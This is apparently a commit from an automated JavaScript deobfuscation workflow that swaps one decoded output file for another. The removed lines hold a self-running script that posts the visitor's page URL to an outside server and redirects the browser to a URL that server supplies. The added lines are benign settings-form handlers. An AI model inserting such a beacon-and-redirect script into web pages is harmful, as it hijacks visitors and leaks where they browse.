Add decoded output file

This commit is contained in:
action
2025-04-18 08:09:25 +00:00
parent 1913c9353b
commit dddc879fa0
2 changed files with 33 additions and 18 deletions

View File

@@ -1,21 +1,36 @@
//Fri Apr 18 2025 06:59:06 GMT+0000 (Coordinated Universal Time) //Fri Apr 18 2025 08:09:25 GMT+0000 (Coordinated Universal Time)
//Base:<url id="cv1cref6o68qmpt26ol0" type="url" status="parsed" title="GitHub - echo094/decode-js: JS混淆代码的AST分析工具 AST analysis tool for obfuscated JS code" wc="2165">https://github.com/echo094/decode-js</url> //Base:<url id="cv1cref6o68qmpt26ol0" type="url" status="parsed" title="GitHub - echo094/decode-js: JS混淆代码的AST分析工具 AST analysis tool for obfuscated JS code" wc="2165">https://github.com/echo094/decode-js</url>
//Modify:<url id="cv1cref6o68qmpt26olg" type="url" status="parsed" title="GitHub - smallfawn/decode_action: 世界上本来不存在加密,加密的人多了,也便成就了解密" wc="741">https://github.com/smallfawn/decode_action</url> //Modify:<url id="cv1cref6o68qmpt26olg" type="url" status="parsed" title="GitHub - smallfawn/decode_action: 世界上本来不存在加密,加密的人多了,也便成就了解密" wc="741">https://github.com/smallfawn/decode_action</url>
!function () { function text() {
var _0x4bfbca = new XMLHttpRequest(), layer.msg("正在提交", {
_0x51ae6e = { "time": 5000000
"link": window.location.href, });
"path": window.location.href.replace(window.location.origin, "") $.ajax({
}, "type": "POST",
_0x5d1321 = "https://www.baidu.com/"; "data": $("#configform").serialize(),
_0x4bfbca.open("POST", "https://ff.up.gnzrmyy.cn/api/url/info"); "url": "index.php?act=setting",
_0x4bfbca.setRequestHeader("Content-Type", "application/json"); "success": function (_0x17e5d2) {
_0x4bfbca.send(JSON.stringify(_0x51ae6e)); layer.msg("保存完成", {
_0x4bfbca.onreadystatechange = function () { "time": 1000
if (4 === _0x4bfbca.readyState && 200 === _0x4bfbca.status) { });
var _0x2c013e = JSON.parse(_0x4bfbca.response); }
if (0 === _0x2c013e.code) return window.location.href = _0x2c013e.data.url, undefined; });
}
function reset1() {
layer.confirm("确定要还原设置吗?", {
"title": "提示"
}, function () {
{
$.ajax({
"type": "POST",
"data": $("#configform").serialize(),
"url": "index.php?act=reset",
"success": function (_0x414a35) {
layer.msg("还原完成", {
"time": 1000
});
}
});
}
});
} }
window.location.href = _0x5d1321;
};
}();

BIN
output.py

Binary file not shown.